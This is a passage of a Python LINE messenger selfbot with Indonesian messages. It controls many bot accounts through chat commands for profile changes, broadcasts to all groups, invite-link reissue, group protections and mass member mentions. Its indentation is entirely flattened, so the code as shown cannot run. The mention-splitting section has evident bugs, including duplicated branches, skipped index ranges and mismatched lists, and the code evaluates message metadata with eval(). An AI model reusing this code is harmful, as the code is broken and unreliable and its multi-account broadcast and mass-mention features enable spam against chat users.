path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["ARfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["ARfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["ARfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["ARfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
ki.sendChatChecked(msg.to, msg_id)
kk.sendChatChecked(msg.to, msg_id)
kc.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "self on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "self off":
if msg._from in admin:
wait["selfbot"] = False
cl.sendText(msg.to, "Selfbot dinonaktifkan")
elif cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
cl.sendMessage(msg.to, str(helpMessage1))
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "â§ÄFamz_Botz_FI\n"
if wait["sticker"] == True: md+="â§StickerãONã\n"
else: md+="â§StickerãOFFã\n"
if wait["contact"] == True: md+="â§ContactãONã\n"
else: md+="â§ContactãOFFã\n"
if wait["talkban"] == True: md+="â§TalkbanãONã\n"
else: md+="â§TalkbanãOFFã\n"
if wait["Mentionkick"] == True: md+="â§NotagãONã\n"
else: md+="â§NotagãOFFã\n"
if wait["detectMention"] == True: md+="â§ResponãONã\n"
else: md+="â§ResponãOFFã\n"
if wait["autoJoin"] == True: md+="â§AutojoinãONã\n"
else: md+="â§AutojoinãOFFã\n"
if wait["autoAdd"] == True: md+="â§AutoaddãONã\n"
else: md+="â§AutoaddãOFFã\n"
if msg.to in welcome: md+="â§WelcomeãONã\n"
else: md+="â§WelcomeãOFFã\n"
if wait["autoLeave"] == True: md+="â§AutoleaveãONã\n"
else: md+="â§AutoleaveãOFFã\n"
if msg.to in protectqr: md+="â§ProtecturlãONã\n"
else: md+="â§ProtecturlãOFFã\n"
if msg.to in protectjoin: md+="â§ProtectjoinãONã\n"
else: md+="â§ProtectjoinãOFFã\n"
if msg.to in protectkick: md+="â§ProtectkickãONã\n"
else: md+="â§ProtectkickãOFFã\n"
if msg.to in protectinvite: md+="â§ProtectinviteãONã\n"
else: md+="â§ProtectinviteãOFFã\n"
if msg.to in protectcancel: md+="â§ProtectcancelãONã\n"
else: md+="â§ProtectcancelãOFFã\n"
if msg.to in protectantijs: md+="â§AntijsãONã\n"
else: md+="â§AntijsãOFFã\n"
if msg.to in ghost: md+="â§GhostãONã\n"
else: md+="â§GhostãOFFã\n"
cl.sendMessage(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'creator':
if msg._from in admin:
cl.sendText(msg.to,"Creator âââââ¦Bardi_Ud0â§ââââº")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "ã Type Selfbot ã\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif cmd == "me" or text.lower() == 'me':
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
elif text.lower() == "mid":
cl.sendMessage(msg.to, msg._from)
elif ("Mid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "â§Nama : "+str(mi.displayName)+"\nâ§Mid : " +key1+"\nâ§Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif cmd == "mybot":
if wait["selfbot"] == True:
if msg._from in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Jmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Zmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Xmid}
cl.sendMessage1(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': JSmid}
cl.sendMessage1(msg)
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif text.lower() == "remove chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
km.removeAllMessages(op.param2)
kb.removeAllMessages(op.param2)
kn.removeAllMessages(op.param2)
ko.removeAllMessages(op.param2)
kw.removeAllMessages(op.param2)
ke.removeAllMessages(op.param2)
ky.removeAllMessages(op.param2)
cl.sendText(msg.to,"Chat dibersihkan...")
except:
pass
elif cmd.startswith("broadcast: "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
cl.sendMessage(group,"[ Broadcast ]\n" + str(pesan))
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "ãMykeyã\nSetkey bot muã " + str(Setmain["keyCommand"]) + " ã")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
cl.sendMessage(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
cl.sendMessage(msg.to, "ãSetkeyã\nSetkey diganti jadiã{}ã".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
cl.sendMessage(msg.to, "ãSetkeyã\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
cl.sendMessage(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
cl.sendMessage(msg.to,bot)
elif cmd == "ginfo":
if msg._from in admin:
try:
G = cl.getGroup(msg.to)
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
cl.sendMessage(msg.to, "â§ÄPĶ Fams Grup Info\n\nâ§Nama Group : {}".format(G.name)+ "\nâ§ID Group : {}".format(G.id)+ "\nâ§Pembuat : {}".format(G.creator.displayName)+ "\nâ§Waktu Dibuat : {}".format(str(timeCreated))+ "\nâ§Jumlah Member : {}".format(str(len(G.members)))+ "\nâ§Jumlah Pending : {}".format(gPending)+ "\nâ§Group Qr : {}".format(gQr)+ "\nâ§Group Ticket : {}".format(gTicket))
cl.sendMessage(msg.to, None, contentMetadata={'mid': G.creator.mid}, contentType=13)
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("infogrup "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
gCreator = G.creator.displayName
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += " Fams Grup Info\n"
ret_ += "\nâ§Nama Group : {}".format(G.name)
ret_ += "\nâ§ID Group : {}".format(G.id)
ret_ += "\nâ§Pembuat : {}".format(gCreator)
ret_ += "\nâ§Waktu Dibuat : {}".format(str(timeCreated))
ret_ += "\nâ§Jumlah Member : {}".format(str(len(G.members)))
ret_ += "\nâ§Jumlah Pending : {}".format(gPending)
ret_ += "\nâ§Group Qr : {}".format(gQr)
ret_ += "\nâ§Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(to, str(ret_))
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "â§"+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"â§Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\nãTotal %i Membersã" % len(G.members))
except:
pass
elif cmd.startswith("leave: "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
group = groups[int(number)-1]
for i in group:
ginfo = cl.getGroup(i)
if ginfo == group:
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
kn.leaveGroup(i)
ko.leaveGroup(i)
kw.leaveGroup(i)
ke.leaveGroup(i)
ky.leaveGroup(i)
cl.sendMessage(msg.to,"Berhasil keluar di grup " +str(ginfo.name))
elif cmd == "fiendlist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getAllContactIds()
for i in gid:
G = cl.getContact(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.displayName+ "\n"
cl.sendMessage(msg.to,"âââ[ FRIEND LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãFriends ]")
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "â " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"âââ[ GROUP LIST ]\nâ\n"+ma+"â\nâââ[ Totalã"+str(len(gid))+"ãGroups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url grup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Nama : "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["ARfoto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["ARfoto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["ARfoto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["ARfoto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["ARfoto"][Dmid] = True
km.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot5up":
if msg._from in admin:
Setmain["ARfoto"][Emid] = True
kb.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot6up":
if msg._from in admin:
Setmain["ARfoto"][Fmid] = True
kn.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot7up":
if msg._from in admin:
Setmain["ARfoto"][Gmid] = True
ko.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot8up":
if msg._from in admin:
Setmain["ARfoto"][Hmid] = True
kw.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot9up":
if msg._from in admin:
Setmain["ARfoto"][Imid] = True
ke.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot10up":
if msg._from in admin:
Setmain["ARfoto"][Jmid] = True
ky.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "antijsup":
if msg._from in admin:
Setmain["ARfoto"][JSmid] = True
js.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "ghost1up":
if msg._from in admin:
Setmain["ARfoto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "ghost2up":
if msg._from in admin:
Setmain["ARfoto"][Xmid] = True
sx.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot4name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = km.getProfile()
profile.displayName = string
km.updateProfile(profile)
km.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot5name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kb.getProfile()
profile.displayName = string
kb.updateProfile(profile)
kb.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot6name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kn.getProfile()
profile.displayName = string
kn.updateProfile(profile)
kn.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot7name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ko.getProfile()
profile.displayName = string
ko.updateProfile(profile)
ko.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot8name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kw.getProfile()
profile.displayName = string
kw.updateProfile(profile)
kw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot9name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ke.getProfile()
profile.displayName = string
ke.updateProfile(profile)
ke.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot10name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ky.getProfile()
profile.displayName = string
ky.updateProfile(profile)
ky.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("antijsname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = js.getProfile()
profile.displayName = string
js.updateProfile(profile)
js.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("ghost1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("ghost2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sx.getProfile()
profile.displayName = string
sx.updateProfile(profile)
sx.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "sepinya" or text.lower() == 'ð':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4,nm5,nm6,nm7,nm8,nm9,nm10,nm11,nm12,nm13,nm14,nm15, jml = [], [], [], [], [], [], [], [], [], [], [], [], [], [], [], len(nama)
if jml <= 20:
mentionMembers(msg.to, nama)
if jml > 20 and jml < 40:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 40 and jml < 60:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 60 and jml < 80:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 80 and jml < 100:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
if jml > 100 and jml < 120:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, len(nama)-1):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
if jml > 120 and jml < 140:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, len(nama)-1):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
if jml > 140 and jml < 160:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, len(nama)-1):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
if jml > 160 and jml < 180:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (150, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, len(nama)-1):
nm8 += [nama[q]]
mentionMembers(msg.to, nm9)
if jml > 160 and jml < 180:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, len(nama)-1):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
if jml > 180 and jml < 200:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, len(nama)-1):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
if jml > 200 and jml < 220:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (40, 59):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (60, 79):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (80, 99):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
for n in range (100, 119):
nm6 += [nama[n]]
mentionMembers(msg.to, nm6)
for o in range (120, 139):
nm7 += [nama[o]]
mentionMembers(msg.to, nm7)
for p in range (140, 159):
nm8 += [nama[p]]
mentionMembers(msg.to, nm8)
for q in range (160, 179):
nm9 += [nama[q]]
mentionMembers(msg.to, nm9)
for r in range (180, 199):
nm10 += [nama[r]]
mentionMembers(msg.to, nm10)
for s in range (200, 219):
nm11 += [nama[s]]
mentionMembers(msg.to, nm11)
for t in range (220, len(nama)-1):
nm12 += [nama[t]]
mentionMembers(msg.to, nm12)
if jml > 220 and jml < 239:
for i in range (0, 19):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (20, 39):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
